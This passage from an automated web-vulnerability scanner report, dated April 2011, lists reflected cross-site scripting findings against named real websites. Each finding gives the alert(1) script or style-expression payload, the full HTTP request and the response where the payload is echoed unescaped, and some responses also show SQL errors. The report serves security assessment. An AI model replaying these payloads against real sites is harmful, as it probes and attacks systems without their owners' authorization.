Date: Sun, 17 Apr 2011 14:21:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: PHPSESSID=280e607399294214bca721ea793af478; path=/
Set-Cookie: se_language_autodetected=1; path=/
Content-Language: en
Content-Type: text/html
Content-Length: 21847


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>aero - the
...[SNIP]...
<select class='small' name='user_language_id' onchange="window.location.href='/profile.php?user=user_share.phpa8bd0"><img src=a onerror=alert(1)>464ed54e568&lang_id='+this.options[this.selectedIndex].value;">
...[SNIP]...

4.79. http://www.alltagz.de/bookmarks/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alltagz.de
Path:   /bookmarks/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fba2"><script>alert(1)</script>0eb25d2f987 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmarks5fba2"><script>alert(1)</script>0eb25d2f987/ HTTP/1.1
Host: www.alltagz.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:52 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_fastcgi/2.4.2 PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny10
Set-Cookie: PHPSESSID=f31196949f4a929d05a4fc5fde49f9a0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>alltagz: Favoriten online
...[SNIP]...
<a href="/bookmarks5fba2"><script>alert(1)</script>0eb25d2f987">
...[SNIP]...

4.80. http://www.allvoices.com/post_event [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /post_event

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a48"><script>alert(1)</script>d40146f6281 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post_eventd2a48"><script>alert(1)</script>d40146f6281 HTTP/1.1
Host: www.allvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:20:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 393ms
Pragma: no-cache
X-QueryRuntime: 0.00659
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Set-Cookie: _T_=byyxux8ut5qtqk1zlo97ex6rd; path=/; expires=Mon, 18 Apr 2011 02:20:53 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Fpost_eventd2a48%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed40146f6281; path=/
Set-Cookie: masala_session_id=ca361ecf3d65fa664236be822f977a79; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/post_eventd2a48"><script>alert(1)</script>d40146f6281"/>
...[SNIP]...

4.81. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 6a13d</noscript><script>alert(1)</script>7af8498f72f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse6a13d</noscript><script>alert(1)</script>7af8498f72f/ajax/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-
...[SNIP]...

4.82. http://www.automasterlandrover.com/smartbrowse/ajax/new.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.automasterlandrover.com
Path:   /smartbrowse/ajax/new.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload ff7f2</noscript><script>alert(1)</script>16ce2972f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.automasterlandrover.com
Proxy-Connection: keep-alive
Referer: http://www.automasterlandrover.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63d606fa404638d9008b915da9d34eb2; JSESSIONID=1o9ay8sxhs37r; ddcpoolid=CmsPoolN; __utmz=1.1303052219.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/50; __utma=1.1930152101.1303052219.1303052219.1303052219.1; __utmc=1; __utmb=1.2.10.1303052219

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-8.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 14379
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:57:09 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms9.pub.wc.dealer.ddc p7070 -->

   <title>The Automaster Land Rover | New Land Rover dealership in Shelburne, VT 05482</title
...[SNIP]...
</script>c5f2daa69&amp;20=www.automasterlandrover.com&amp;21=/smartbrowse/ajaxff7f2</noscript><script>alert(1)</script>16ce2972f0d/new.htm&amp;50=63d606fa404638d9008b915da9d34eb2&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10&
...[SNIP]...

4.83. http://www.bibsonomy.org/BibtexHandler [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bibsonomy.org
Path:   /BibtexHandler

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7912f"><script>alert(1)</script>ffb7212d2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4 HTTP/1.1
Host: www.bibsonomy.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:21:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en
Via: 1.1 www.bibsonomy.org, 1.1 www.bibsonomy.org
X-Pingback: http://scraper.bibsonomy.org/xmlrpc
Vary: Accept-Encoding
Connection: close
Content-Length: 8080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; cha
...[SNIP]...
<a href="/BibtexHandler7912f"><script>alert(1)</script>ffb7212d2e4?lang=de">
...[SNIP]...

4.84. http://www.blurpalicious.com/submit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blurpalicious.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70 was submitted in the REST URL parameter 1. This input was echoed as bbc96"style="x:expression(alert(1))"9670aa4b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submitbbc96"style%3d"x%3aexpression(alert(1))"9670aa4b70/ HTTP/1.1
Host: www.blurpalicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:21:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d4f1d7c3f1f6f498ed8932dfa3207b2f; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<meta name="keywords" content="submitbbc96"style="x:expression(alert(1))"9670aa4b70 online, submitbbc96"style="x:expression(alert(1))"9670aa4b70 review, submitbbc96"style="x:expression(alert(1))"9670aa4b70 free, submitbbc96"style="x:expression(alert(1))"9670aa4b70 information, submit
...[SNIP]...

4.85. http://www.brownrudnick.com/bio/srchrslt_alpha.asp [LName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /bio/srchrslt_alpha.asp

Issue detail

The value of the LName request parameter is copied into the HTML document as plain text between tags. The payload 2273c<script>alert(1)</script>da3fa89dfa4 was submitted in the LName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bio/srchrslt_alpha.asp?LName=A2273c<script>alert(1)</script>da3fa89dfa4 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:07:33 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11529
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Professional Directory</t
...[SNIP]...
<b> &quot;A2273c<script>alert(1)</script>da3fa89dfa4&quot;</b>
...[SNIP]...

4.86. http://www.brownrudnick.com/disc/cntcdisclaimer.asp [ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /disc/cntcdisclaimer.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload cf64e<script>alert(1)</script>e02f267a586 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disc/cntcdisclaimer.asp?ID=461cf64e<script>alert(1)</script>e02f267a586 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 15:09:56 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 12696
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Notice</title>
<link rel
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 461cf64e<script>alert(1)</script>e02f267a586)'.<br>
...[SNIP]...

4.87. http://www.brownrudnick.com/nr/articlesIndv.asp [ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesIndv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload f0bd0<script>alert(1)</script>ba5591b9a23 was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesIndv.asp?ID=554f0bd0<script>alert(1)</script>ba5591b9a23 HTTP/1.1
Host: www.brownrudnick.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDSSSASTRS=FHKLAMJAAMPCLADDLOGDPJOG;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 16 Apr 2011 14:47:37 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Connection: close
Content-Length: 11223
Content-Type: text/html
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(ID = 554f0bd0<script>alert(1)</script>ba5591b9a23)'.<br>
...[SNIP]...

4.88. http://www.colivia.de/submit.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colivia.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 was submitted in the REST URL parameter 1. This input was echoed as 8f132\" style=x:expression(alert(1)) 7970fd9dcc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php8f132"%20style%3dx%3aexpression(alert(1))%207970fd9dcc1 HTTP/1.1
Host: www.colivia.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:22:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=d4fbc49fd988d8deff16e4092aa20bc6; path=/
Connection: close
Content-Type: text/html
Content-Length: 13901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/upcoming.php?category=submit.php8f132\" style=x:expression(alert(1)) 7970fd9dcc1">
...[SNIP]...

4.89. http://www.deweyleboeuf.com/en/Firm/MediaCenter/PressReleases.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Firm/MediaCenter/PressReleases.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c61"><script>alert(1)</script>6973c4e8044 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Firm/MediaCenter/PressReleases.aspx?14c61"><script>alert(1)</script>6973c4e8044=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:42:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 89927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?14c61"><script>alert(1)</script>6973c4e8044=1&pg=1">
...[SNIP]...

4.90. http://www.deweyleboeuf.com/en/Ideas/ClientAlerts.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/ClientAlerts.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2cd"><script>alert(1)</script>6a3943ac963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/ClientAlerts.aspx?2e2cd"><script>alert(1)</script>6a3943ac963=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 78019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?2e2cd"><script>alert(1)</script>6a3943ac963=1&pg=1">
...[SNIP]...

4.91. http://www.deweyleboeuf.com/en/Ideas/Events.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e4bd"><script>alert(1)</script>7eca4c40787 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events.aspx?9e4bd"><script>alert(1)</script>7eca4c40787=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?9e4bd"><script>alert(1)</script>7eca4c40787=1&pg=1">
...[SNIP]...

4.92. http://www.deweyleboeuf.com/en/Ideas/Events/EventArchive.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Events/EventArchive.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d0c5"><script>alert(1)</script>4b948308b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Events/EventArchive.aspx?5d0c5"><script>alert(1)</script>4b948308b21=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:44:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 92673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5d0c5"><script>alert(1)</script>4b948308b21=1&pg=1">
...[SNIP]...

4.93. http://www.deweyleboeuf.com/en/Ideas/InTheNews.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/InTheNews.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5044b"><script>alert(1)</script>1fae55877d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/InTheNews.aspx?5044b"><script>alert(1)</script>1fae55877d0=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=86622477.1302961759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=86622477.1300520895.1302961759.1302961759.1302961759.1; __utmc=86622477; __utmb=86622477.1.10.1302961759; ASP.NET_SessionId=rcsrgderh04wwm5500gzommn;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Apr 2011 15:43:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: website#lang=en; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 77557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="conten
...[SNIP]...
<a href="?5044b"><script>alert(1)</script>1fae55877d0=1&pg=1">
...[SNIP]...

4.94. http://www.deweyleboeuf.com/en/Ideas/Publications/AttorneyArticles.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.deweyleboeuf.com
Path:   /en/Ideas/Publications/AttorneyArticles.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7176a"><script>alert(1)</script>129891fa40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/Ideas/Publications/AttorneyArticles.aspx?7176a"><script>alert(1)</script>129891fa40c=1 HTTP/1.1
Host: www.deweyleboeuf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
